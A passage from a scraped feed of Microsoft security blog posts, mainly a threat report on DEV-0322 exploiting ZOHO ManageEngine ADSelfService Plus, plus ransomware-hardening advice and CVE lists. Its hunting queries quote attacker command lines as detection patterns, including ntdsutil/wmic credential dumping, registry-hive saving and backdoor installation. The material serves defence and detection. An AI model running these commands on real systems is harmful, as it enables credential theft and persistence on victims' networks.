spots:\n\n * Turn on [cloud-delivered protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?view=o365-worldwide>) in Microsoft Defender Antivirus to cover rapidly evolving attacker tools and techniques, block new and unknown malware variants, and enhance attack surface reduction rules and tamper protection.\n * Turn on [tamper protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) features to prevent attackers from stopping security services.\n * Run [EDR in block mode](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide>) so that Microsoft Defender for Endpoint can block malicious artifacts, even when a non-Microsoft antivirus doesn\u2019t detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode also blocks indicators identified proactively by Microsoft Threat Intelligence teams.\n * Enable [network protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/enable-network-protection?view=o365-worldwide>) to prevent applications or users from accessing malicious domains and other malicious content on the internet.\n * Enable [investigation and remediation](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide>) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches.\n * Use [device discovery](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/device-discovery?view=o365-worldwide>) to increase visibility into the network by finding unmanaged devices and onboarding them to Microsoft Defender for Endpoint.\n * [Protect user identities and credentials](<https://docs.microsoft.com/defender-for-identity/what-is>) using Microsoft Defender for Identity, a cloud-based security solution that leverages on-premises Active Directory signals to monitor and analyze user behavior to identify suspicious user activities, configuration issues, and active attacks.\n\n### Reducing the attack surface\n\nMicrosoft 365 Defender customers can turn on [attack surface reduction rules](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction?view=o365-worldwide>) to prevent common attack techniques used in ransomware attacks. These rules, which can be configured by all Microsoft Defender Antivirus customers and not just those using the EDR solution, offer significant hardening against attacks. In observed attacks from several ransomware-associated activity groups, Microsoft customers who had the following rules enabled were able to mitigate the attack in the initial stages and prevented hands-on-keyboard activity:\n\n * Common entry vectors:\n * [Block all Office applications from creating child processes](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-all-office-applications-from-creating-child-processes>)\n * [Block Office communication application from creating child processes](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-office-communication-application-from-creating-child-processes>)\n * [Block Office applications from creating executable content](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-office-applications-from-creating-executable-content>)\n * [Block Office applications from injecting code into other processes](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-office-applications-from-injecting-code-into-other-processes>)\n * [Block execution of potentially obfuscated scripts](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-execution-of-potentially-obfuscated-scripts>)\n * [Block JavaScript or VBScript from launching downloaded executable content](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-javascript-or-vbscript-from-launching-downloaded-executable-content>)\n * Ransomware deployment and lateral movement stage (in order of impact based on the stage in attack they prevent):\n * [Block executable files from running unless they meet a prevalence, age, or trusted list criterion](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion>)\n * [Block credential stealing from the Windows local security authority subsystem (lsass.exe)](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-credential-stealing-from-the-windows-local-security-authority-subsystem>)\n * [Block process creations originating from PsExec and WMI commands](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-process-creations-originating-from-psexec-and-wmi-commands>)\n * [Use advanced protection against ransomware](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#use-advanced-protection-against-ransomware>)\n\nIn addition, Microsoft has changed the [default behavior of Office applications to block macros](<https://docs.microsoft.com/DeployOffice/security/internet-macros-blocked>) in files from the internet, further reduce the attack surface for many human-operated ransomware attacks and other threats.\n\n### Hardening internet-facing assets and understanding your perimeter\n\nOrganizations must identify and secure perimeter systems that attackers might use to access the network. Public scanning interfaces, such as [RiskIQ](<https://www.riskiq.com/what-is-attack-surface-management/>), can be used to augment data. Some systems that should be considered of interest to attackers and therefore need to be hardened include:\n\n * Secure Remote Desktop Protocol (RDP) or Windows Virtual Desktop endpoints with MFA to harden against password spray or brute force attacks.\n * Block Remote IT management tools such as Teamviewer, Splashtop, Remote Manipulator System, Anydesk, Atera Remote Management, and ngrok.io via network blocking such as perimeter firewall rules if not in use in your environment. If these systems are used in your environment, enforce security settings where possible to implement MFA.\n\nRansomware attackers and access brokers also use unpatched vulnerabilities, whether already disclosed or zero-day, especially in the initial access stage. Even older vulnerabilities were implicated in ransomware incidents in 2022 because some systems remained unpatched, partially patched, or because access brokers had established persistence on a previously compromised systems despite it later being patched.\n\nSome observed vulnerabilities used in campaigns between 2020 and 2022 that defenders can check for and mitigate include:\n\n * Citrix ADC systems affected by [CVE-2019-19781](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781>)\n * [Pulse Secure VPN systems](<https://us-cert.cisa.gov/ncas/alerts/aa21-110a>) affected by [CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>), [CVE-2020-8260](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8260>), [CVE-2020-8243](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8243>), [CVE-2021-22893](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/>), [CVE-2021-22894](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22894>), [CVE-2021-22899](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22899>), and [CVE-2021-22900](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22900>)\n * SonicWall SSLVPN affected by [CVE-2021-20016](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20016>)\n * Microsoft SharePoint servers affected by [CVE-2019-0604](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2019-0604>)\n * Unpatched [Microsoft Exchange servers](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-may-2021-exchange-server-security-updates/ba-p/2335209>)\n * Zoho ManageEngine systems affected by [CVE-2020-10189](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10189>)\n * FortiGate VPN servers affected by [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>)\n * Apache log4j [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>)\n\nRansomware attackers also rapidly [adopt new vulnerabilities](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>). To further reduce organizational exposure, Microsoft Defender for Endpoint customers can use the [threat and vulnerability management](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt>) capability to discover, prioritize, and remediate vulnerabilities and misconfigurations.\n\n## Microsoft 365 Defender: Deep cross-domain visibility and unified investigation capabilities to defend against ransomware attacks\n\nThe multi-faceted threat of ransomware requires a comprehensive approach to security. The steps we outlined above defend against common attack patterns and will go a long way in preventing ransomware attacks. [Microsoft 365 Defender](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>) is designed to make it easy for organizations to apply many of these security controls.\n\nMicrosoft 365 Defender\u2019s industry-leading visibility and detection capabilities, demonstrated in the recent [MITRE Engenuity ATT&amp;CK\u00ae Evaluations](<https://www.microsoft.com/security/blog/2022/04/05/microsoft-365-defender-demonstrates-industry-leading-protection-in-the-2022-mitre-engenuity-attck-evaluations/>), automatically stop most common threats and attacker techniques. To equip organizations with the tools to combat human-operated ransomware, which by nature takes a unique path for every organization, Microsoft 365 Defender provides rich investigation features that enable defenders to seamlessly inspect and remediate malicious behavior across domains.\n\n[Learn how you can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365.](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>)\n\nIn line with the recently announced expansion into a new service category called [**Microsoft Security Experts**](<https://www.microsoft.com/en-us/security/business/services>), we&#x27;re introducing the availability of [Microsoft Defender Experts for Hunting](<https://docs.microsoft.com/en-us/microsoft-365/security/defender/defenderexpertsforhuntingprev>) for public preview. Defender Experts for Hunting is for customers who have a robust security operations center but want Microsoft to help them proactively hunt for threats across Microsoft Defender data, including endpoints, Office 365, cloud applications, and identity.\n\nJoin our research team at the **Microsoft Security Summit** digital event on May 12 to learn what developments Microsoft is seeing in the threat landscape, as well as how we can help your business mitigate these types of attacks. Ask your most pressing questions during the live chat Q&amp;A. [Register today.](<https://mssecuritysummit.eventcore.com?ocid=AID3046765_QSG_584073>)\n\nThe post [Ransomware-as-a-service: Understanding the cybercrime gig economy and how to protect yourself](<https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-09T13:00:00", "type": "mmpc", "title": "Ransomware-as-a-service: Understanding the cybercrime gig economy and how to protect yourself", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-10189", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-20016", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-31207", "CVE-2021-40444", "CVE-2021-44228"], "modified": "2022-05-09T13:00:00", "id": "MMPC:27EEFD67E5E7E712750B1472E15C5A0B", "href": "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mssecure": [{"lastseen": "2021-11-09T18:34:15", "description": "Microsoft has detected exploits being used to compromise systems running the ZOHO ManageEngine ADSelfService Plus software versions vulnerable to [CVE-2021-40539](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539>) in a targeted campaign. Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to DEV-0322, a group operating out of China, based on observed infrastructure, victimology, tactics, and procedures.\n\nMSTIC previously highlighted DEV-0322 activity related to [attacks targeting the SolarWinds Serv-U software with 0-day exploit](<https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/>). As with any observed nation-state actor activity, Microsoft notifies customers that have been targeted or compromised, providing them with the information they need to help secure their accounts.\n\nOur colleagues at Palo Alto Unit 42 have also highlighted this activity in [their recent blog](<https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/>). We thank Unit 42 for their collaboration as industry partners and ongoing efforts to protect customers. We would also like to thank our partners in [Black Lotus Labs](<https://www.lumen.com/en-us/security/black-lotus-labs.html>) at Lumen Technologies for their contributions to our efforts to track and mitigate this threat.\n\nThis blog shares what Microsoft has observed in the latest DEV-0322 campaign and inform our customers of protections in place through our security products. We have not observed any exploit of Microsoft products in this activity.\n\nMSTIC uses DEV-#### designations as a temporary name given to an unknown, emerging, or developing cluster of threat activity, allowing MSTIC to track it as a unique set of information until we can reach high confidence about the origin or identity of the actor behind the activity. Once it meets defined criteria, a DEV group is converted to a named actor.\n\n## Activity description\n\nMSTIC first observed the latest DEV-0322 campaign on September 22, 2021, with activity against targets that appear to be in the Defense Industrial Base, higher education, consulting services, and information technology sectors. Following initial exploitation of CVE-2021-40539 on a targeted system, DEV-0322 performed several activities including credential dumping, installing custom binaries, and dropping malware to maintain persistence and move laterally within the network.\n\n### Credential dumping\n\nIn this campaign, DEV-0322 was observed performing credential dumping using the following commands:\n\n\n\nDEV-0322 also occasionally deployed a tool to specifically read security event logs and look for Event ID 4624 events. Next, their tool would collect domains, usernames, and IP addresses and write them to the file _elrs.txt_. They typically called this tool _elrs.exe_, and below is an example of how they would call it:\n\n\n\nAfter gaining credentials, DEV-0322 was observed moving laterally to other systems on the network and dropping a custom IIS module with the following command:\n\n\n\n### Installing custom IIS module\n\nThe _gac.exe_ binary installs _ScriptModule.dll_ into the Global Assembly Cache before using _AppCmd__.exe_ to install it as an IIS module. _AppCmd.exe_ is a command line tool included in IIS 7+ installations used for server management. This module hooks into the BeginRequest IIS http event and looks for custom commands and arguments being passed via the Cookies field of the HTTP header.\n\n\n\n_Figure 1: Encoded request from the controller to the victim machine_\n\nThe custom IIS module supports execution for _cmd.exe_ and PowerShell commands. It also provides DEV-0322 with the ability to direct download and upload of files to and from a compromised IIS web server. The module also observes incoming authentication credentials and captures them; it then encodes these and writes them to the following path:\n\n_C:\\ProgramData\\Microsoft\\Crypto\\RSA\\key.dat_\n\nIf this module receives the command \u201cccc,\u201d it drops a file _c:\\windows\\temp\\ccc.exe_. The file _ccc.exe_ is a .NET program that launches _cmd.exe_ with an argument and sends any output back to the controller.\n\n\n\n_Figure 2: The Base64-encoded ccc.exe contained inside the IIS module backdoor_\n\nBelow is an example command from _w3wp.exe_ process after _ccc.exe is_ dropped:\n\n`\"c:\\windows\\temp\\ccc.exe\" dir`\n\n### Deploying Zebracon malware\n\nIn addition to a custom IIS module, DEV-0322 also deployed a Trojan that we are calling Trojan:Win64/Zebracon. This Trojan uses hardcoded credentials to make connections to suspected DEV-0322-compromised Zimbra email servers.\n\nSubsequent commands are made to _&lt;ZimbraServer&gt;/service/soap_ using an obtained authorization token (ZM_AUTH_TOKEN) to perform email operations on the threat actor-controlled mailbox, such as the following:\n\n * Search email (e.g., _&lt;query&gt;(in:\\&quot;inbox\\&quot; or in:\\&quot;junk\\&quot;) is:unread&lt;/query&gt;_)\n * Read email\n * Send email (e.g., _Subject: __[AutoReply] I&#x27;ve received your mail, I will check it soon!_)\n\nThese operations are used by the Zebracon malware to receive commands from the DEV-0322-controlled mailbox.\n\nFiles related to the Zebracon Trojan have the following metadata:\n\n * Company name: \n * Synacor. Inc.\n * File description: \n * Zimbra Soap Suites\n * Zimbra Soap Tools\n * Internal name: \n * newZimbr.dll\n * zimbra-controller-dll.dll\n * Original filename: \n * newZimbr.dll\n * ZIMBRA-SOAP.DLL\n\nMicrosoft will continue to monitor DEV-0322 activity and implement protections for our customers. The current detections, advanced detections, and IOCs in place across our security products are detailed below.\n\n## Detections\n\n### Microsoft 365 Defender detections\n\n**Antivirus**** **\n\nMicrosoft Defender Antivirus detects threat components as the following malware:\n\n * Trojan:MSIL/Gacker.A!dha\n * Backdoor:MSIL/Kokishell.A!dha\n * Trojan:Win64/Zebracon.A!dha\n\n**Endpoint detection and response (EDR)**** **\n\nAlerts with the following titles in the security center can indicate threat activity on your network:\n\n * DEV-0322 Actor activity detected\u200b\n * Malware from possible exploitation of CVE-2021-40539\n\nThe following alerts may also indicate activity associated with this threat. These alerts can be triggered by unrelated threat activity, but they are listed here for reference:\n\n * &#x27;Zebracon&#x27; high-severity malware was detected\n * Anomaly detected in ASEP registry\n\nMicrosoft 365 Defender correlates any related alerts into [incidents](<https://docs.microsoft.com/microsoft-365/security/defender/investigate-incidents?view=o365-worldwide>) to help customers determine with confidence if observed alerts are related to this activity. Customers using the Microsoft 365 Defender portal can view, investigate, and respond to incidents that include any detections related to this DEV-0322 activity.\n\nThe threat and vulnerability management module in Microsoft Defender for Endpoint (included in Microsoft 365 Defender) provides insights related to CVE-2021-40539. Customers can find affected devices in their environment in the Microsoft 365 Defender portal and initiate the appropriate version update of the ManageEngine software. Customers can also use the hunting query included below to identify devices that might be vulnerable to CVE-2021-40539.\n\n### Microsoft Sentinel detections\n\nThe indicators of compromise (IoCs) included in this blog post are also available to Microsoft Sentinel customers through the _Microsoft Emerging Threat Feed_ located in the [Microsoft Sentinel Threat Intelligence blade](<https://docs.microsoft.com/azure/sentinel/understand-threat-intelligence>). These can be used by customers for detection purposes alongside the hunting queries detailed below.\n\n## Advanced hunting queries\n\n### Microsoft Sentinel hunting queries\n\n**Name**: DEV-0322 Command Line Activity November 2021 \n**Description**: This hunting query looks for process command line activity related to observed DEV-0322 activity as detailed in this blog post. It locates command lines that are used as part of the threat actor&#x27;s post-exploitation activity. The query uses additional data from Microsoft Defender for Endpoint to generate a risk score associated with each result. Hosts with higher risk events should be investigated first.\n\n<https://github.com/azure/azure-sentinel/blob/master/Hunting%20Queries/MultipleDataSources/Dev-0322CommandLineActivityNovember2021.yaml>\n\n**Name**: DEV-0322 File Drop Activity November 2021 \n**Description**: This hunting query looks for file creation events related to observed DEV-0322 activity as detailed in this blog. The files this query hunts for are dropped as part of the threat actor\u2019s post-exploitation activity. The query uses other additional data from Microsoft Defender for Endpoint to generate a risk score associated with each result. Hosts with higher risk events should be investigated first.\n\n<https://github.com/azure/azure-sentinel/blob/master/Hunting%20Queries/MultipleDataSources/Dev-0322FileDropActivityNovember2021.yaml>\n\nIn addition to these queries, there are equivalent queries that use the Microsoft Sentinel Information Model (MSIM) to look for the same activity. If you are using MSIM you can find these queries here:\n\n * <https://github.com/azure/azure-sentinel/blob/master/Hunting%20Queries/MultipleDataSources/Dev-0322CommandLineActivityNovember2021-MSIM.yaml>\n * <https://github.com/azure/azure-sentinel/blob/master/Hunting%20Queries/MultipleDataSources/Dev-0322FileDropActivityNovember2021-MSIM.yaml>\n\n### Microsoft 365 Defender hunting queries\n\n**Name: **Surface devices with the CVE-2021-40539 vulnerability \n**Description: **Use this query to look for devices in your organization that are possibly vulnerable to CVE-2021-40539. [Run query](<https://security.microsoft.com/v2/advanced-hunting?query=H4sIAAAAAAAAA2WQuw6CQBBFT23iP2yoNb4LCyqwsFETjT3iEjQgBlAaP967FkqwmJ27N7NnZjbE8uRCrHyQytlTkFDTEFHKPfIg4yZVyjmpNlPUCkuFoU-PFyPTkH5qrHQgkmXNWdrH1-kRiLRiyJSxYiI1l1owY4n35RjuYhRc9T5WF0PYmtARBx1vo6lyZef_-rrbVrvsNG0kTiJmqTrndzdsE_63dztV6lXoD949nbyNLgEAAA&timeRangeId=week>).\n\n`DeviceTvmSoftwareVulnerabilities \n| where CveId == \"CVE-2021-40539\" \n| project DeviceId, DeviceName, CveId, OSPlatform, SoftwareName, SoftwareVersion`\n\n**Name: **Hunt for suspicious dropped files post-exploitation \n**Description: **Look for suspicious files dropped the the threat actor\u2019s post-exploitation activity. [Run query](<https://security.microsoft.com/v2/advanced-hunting?query=H4sIAAAAAAAAA41T20rDQBCdZ8F_WPrUQmzelT6U1EKhSlHfVKSm6T1JyUZrwI_3zMmGJlGhLNmZneuZS3zxxchUUpwduCVoBprLWiJQKwfQUDbQbEAN6R4yC34B2xQWarPA-10K55tBMgdncIegGvVSLvAuj0bIW9EGjFhIAp-Y2bryLB0J5FpecGbMtsKt-hHjz6m5o7VqLb4l5CoNICmATbPr-0EeZUhuh4yF9JGtxNgRj3foMh0RL4E2BWcpyeERI5byIU8fki98HXmVntw0qhtB_klMkYxdhbeQRIiaI2Ld9hvfkd3O2PHK_p5VqiQiFktU2ltFGsEmg-yEwrjJjUH3sNd4M9anHmtwVt5wJ5xRt9b5XgOPz42YwC50U7REUW1EBj_LXbGwSB1q7brhO8aZE3E5-5A5LDu6qk1ctXvOyzCDVtnuyxZa9TPIV05kQN8lZ_rBqWSspt7xck-qvOf2vekVNCqZMnvkKky4dyqxbmtiVuvz__g9mR77k7T2YgKfNp4DMWz5x-VyRWTa4YWr8wm-MRHm3I4D97Yetdoa749N8v7ZDu_M6j23F7qFG_qWM236DjlznY72qcr9A2VPOedoBAAA&timeRangeId=week>).\n\n`// Look for the specific files dropped by threat actor \nlet files = dynamic([\"C:\\\\ProgramData\\\\Microsoft\\\\Crypto\\\\RSA\\\\key.dat \", \"c:\\\\windows\\\\temp\\\\ccc.exe\"]); \nDeviceFileEvents \n| where FileName endswith \"elrs.exe\" or FolderPath has_any (files) \n// Increase the risk score of command accessing file also seen \n| join kind=leftouter (DeviceProcessEvents \n| where ProcessCommandLine contains \"cmd /c elrs.exe\") on DeviceId \n| project-reorder Timestamp, DeviceName, FileName, FolderPath, ProcessCommandLine, InitiatingProcessAccountName`\n\n**Name: **Hunt for command lines observed used by the DEV-0322 actor \n**Description: **Look for suspicious command lines that are used as part of the threat actor&#x27;s post-exploitation activity. [Run query](<https://security.microsoft.com/v2/advanced-hunting?query=H4sIAAAAAAAAA71W72_SUBS9n038H8i-wAyDRM0-zGCic8uIsJixmJg5CbQd1NGCtMBm_OM997xXaaHFitE09N333v31zj33laY0pSIdmeK5h3SHcY7RwRjgGUgoLuYT8SF5EkGeyhCjB70l3rq74FyloTziHcsYczPOIQ0gVfB2MKr_p_IEc_NMsB8zYgAP_UykFn4uPIawDbDuSE1upGp1G9B6YJwmVipyICurpSshIrnYPWEGro1uspxhbYq5RokYe4C4E0pJvh49hpBc6Cww-tSImM0M4xg-NPPPeA6sfx-YJNZ6jgiyYuhwJfFmLDajfUMUnx7X0mtqndBiRY8uoq6sD7ULkIvK6rvBc8bw_Qoo1WFbZYQR9JeQXshzYhOV9rqwlT6Wl_SuKCWei1HcxtFULKlUudgjYrqu8hG0i23Tlj3G9zGLpUseLMiz5ASKa7kcYkprXKtyK4dAN83gd9BfkneefMhgcsYO0cpEGYtmQdcZtsSWwwlm6Y5I-jHbFdqTITHSeqn2CLKpvKKXjv0DvxX7c06LbManmb7v2MgV6A-w2-e6dngtp18Pmce8tM-AZ3WYS5TJVxkTYXdJvQt5D6uurewn_K6BbBc7N_IF71t5hjx6yCuytWvApi0f2WMmozZi-kTW4KsI_YuT7x_n_-CxyQS92Uw22i_f6V_v_gVZW8PJtNfPsTentx40lNEtMi-ExjXGgBnH5OPM2nSI29rC3OYa6aHAKvl6pPupDYzqG2uXtPC4XgZb1XsDnfW50h7Oea9nve5bxXK2-0UsPsGf2vag4-bcR29ZMY_M8yHdkx8Ome3ZO0a_YcqYIe8PXbv7zb-F6Ff9k1vO470-Zm9NyYBNVirnY1qptyubTS-VSyvD0_6WB_Nt-gpd_Sof0UptXZt3HqfzWFvPjb-LkXns_TuW7kYn3uokg07--bIRTvm9iJnPGVeUR4_WQzHjLmzddtvnIfQTp42GkHAKAAA&timeRangeId=week>).\n\n`// Look for command lines observed used by the threat actor \nlet cmd_lines = dynamic(['cmd.exe /c \"wmic /node:redacted process call create \"ntdsutil snapshot \\\\\"activate instance ntds\\\\\" create quit quit > c:\\\\windows\\\\temp\\\\nt.dat\";', 'regsvr32 /s c:\\\\windows\\\\temp\\\\user64.dll', 'process call create \"cmd /c c:\\\\windows\\\\temp\\\\gac.exe -i c:\\\\windows\\temp\\\\ScriptModule.dll >c:\\\\windows\\\\temp\\\\tmp.dat\"']); \nDeviceProcessEvents \n// Look for static cmd lines and dynamic one using regex \n| where ProcessCommandLine has_any (cmd_lines) or ProcessCommandLine matches regex \"save HKLM\\\\SYSTEM [^ ]*_System.HIV\" or InitiatingProcessCommandLine has_any (cmd_lines) or InitiatingProcessCommandLine matches regex \"save HKLM\\\\SYSTEM [^ ]*_System.HIV\" \n| summarize count(), FirstSeen=min(Timestamp), LastSeen = max(Timestamp) by DeviceId, DeviceName, ProcessCommandLine, AccountName, FileName, InitiatingProcessCommandLine, InitiatingProcessFileName, InitiatingProcessAccountName, InitiatingProcessAccountSid \n// Base risk score on number of command lines seen for each host \n| extend RiskScore = count_ \n| project-reorder FirstSeen, LastSeen, RiskScore, DeviceName, DeviceId, ProcessCommandLine, AccountName \n| extend timestamp = FirstSeen, AccountCustomEntity = AccountName, HostCustomEntity = DeviceName`\n\n## Indicators of compromise (IOCs)\n\nType | Indicator \n---|--- \nSHA-256 | bb4765855d2c18c4858dac6af207a4b33e70c090857ba21527dc2b22e19d90b5 \nSHA-256 | e5edd4f773f969d81a09b101c79efe0af57d72f19d5fe71357de10aacdc5473e \nSHA-256 | 79e3f4ef28ab6f118c839d01a404cccae56f4067f3f2d2add3603be5c717932b \nSHA-256 | a2da9eeb47a0eef4a93873bcc595f8a133a927080a2cd0d3cb4b4f5101a5c5c2 \nSHA-256 | d1d43afd8cab512c740425967efc9ed815a65a8dad647a49f9008732ffe2bb16 \nSHA-256 | 3c90df0e02cc9b1cf1a86f9d7e6f777366c5748bd3cf4070b49460b48b4d4090 \nSHA-256 | ae93e2f0b3d0864e4dd8490ff94abeb7279880850b22e8685cd90d21bfe6b1d6 \nSHA-256 | b4162f039172dcb85ca4b85c99dd77beb70743ffd2e6f9e0ba78531945577665 \nSHA-256 | b0a3ee3e457e4b00edee5746e4b59ef7fdf9b4f9ae2e61fc38b068292915d710 \nSHA-256 | bec067a0601a978229d291c82c35a41cd48c6fca1a3c650056521b01d15a72da \nSHA-256 | 1e031d0491cff504e97a5de5308f96dc540d55a34beb5b3106e5e878baf79d59 \nSHA-256 | f757d5698fe6a16ec25a68671460bd10c6d72f972ca3a2c2bf2c1804c4d1e20e \nSHA-256 | 322368e7a591af9d495406c4d9b2461cd845d0323fd2be297ec06ed082ee7428 \nSHA-256 | 5fcc9f3b514b853e8e9077ed4940538aba7b3044edbba28ca92ed37199292058 \nSHA-256 | b2a29d99a1657140f4e254221d8666a736160ce960d06557778318e0d1b7423b \n \n \n\nThe post [Threat actor DEV-0322 exploiting ZOHO ManageEngine ADSelfService Plus](<https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {}, "published": "2021-11-09T00:24:55", "type": "mssecure", "title": "Threat actor DEV-0322 exploiting ZOHO ManageEngine ADSelfService Plus", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-09T00:24:55", "id": "MSSECURE:B1806E4D7F97F83DB41A41A9BBF86D13", "href": "https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-30T23:04:13", "description": "At a time when remote work is becoming universal and the strain on SecOps, especially in healthcare and critical industries, has never been higher, ransomware actors are unrelenting, continuing their normal operations.\n\nMultiple ransomware groups that have been accumulating access and maintaining persistence on target networks for several months activated dozens of ransomware deployments in the first two weeks of April 2020. So far the attacks have affected aid organizations, medical billing companies, manufacturing, transport, government institutions, and educational software providers, showing that these ransomware groups give little regard to the critical services they impact, global crisis notwithstanding. These attacks, however, are not limited to critical services, so organizations should be vigilant for signs of compromise.\n\nThe ransomware deployments in this two-week period appear to cause a slight uptick in the volume of ransomware attacks. However, Microsoft security intelligence as well as forensic data from relevant incident response engagements by Microsoft Detection and Response Team (DART) showed that many of the compromises that enabled these attacks occurred earlier. Using an attack pattern typical of [human-operated ransomware](<https://aka.ms/human-operated-ransomware>) campaigns, attackers have compromised target networks for several months beginning earlier this year and have been waiting to monetize their attacks by deploying ransomware when they would see the most financial gain.\n\nMany of these attacks started with the exploitation of vulnerable internet-facing network devices; others used brute force to compromise RDP servers. The attacks delivered a wide range of payloads, but they all used the same techniques observed in human-operated ransomware campaigns: credential theft and lateral movement, culminating in the deployment of a ransomware payload of the attacker\u2019s choice. Because the ransomware infections are at the tail end of protracted attacks, defenders should focus on hunting for signs of adversaries performing credential theft and lateral movement activities to prevent the deployment of ransomware.\n\nIn this blog, we share our in-depth analysis of these ransomware campaigns. Below, we will cover:\n\n * Vulnerable and unmonitored internet-facing systems provide easy access to human-operated attacks\n * A motley crew of ransomware payloads\n * Immediate response actions for active attacks\n * Building security hygiene to defend networks against human-operated ransomware\n * Microsoft Threat Protection: Coordinated defense against complex and wide-reaching human-operated ransomware\n\nWe have included additional technical details including hunting guidance and recommended prioritization for security operations (SecOps).\n\n## Vulnerable and unmonitored internet-facing systems provide easy access to human-operated attacks\n\nWhile the recent attacks deployed various ransomware strains, many of the campaigns shared infrastructure with previous ransomware campaigns and used the same techniques commonly observed in human-operated ransomware attacks.\n\nIn stark contrast to attacks that deliver ransomware via email\u2014which tend to unfold much faster, with ransomware deployed within an hour of initial entry\u2014the attacks we saw in April are similar to the Doppelpaymer ransomware campaigns from 2019, where attackers gained access to affected networks months in advance. They then remained relatively dormant within environments until they identified an opportune time to deploy ransomware.\n\nTo gain access to target networks, the recent ransomware campaigns exploited internet-facing systems with the following weaknesses:\n\n * Remote Desktop Protocol (RDP) or Virtual Desktop endpoints without multi-factor authentication (MFA)\n * Older platforms that have reached end of support and are no longer getting security updates, such as Windows Server 2003 and Windows Server 2008, exacerbated by the use of weak 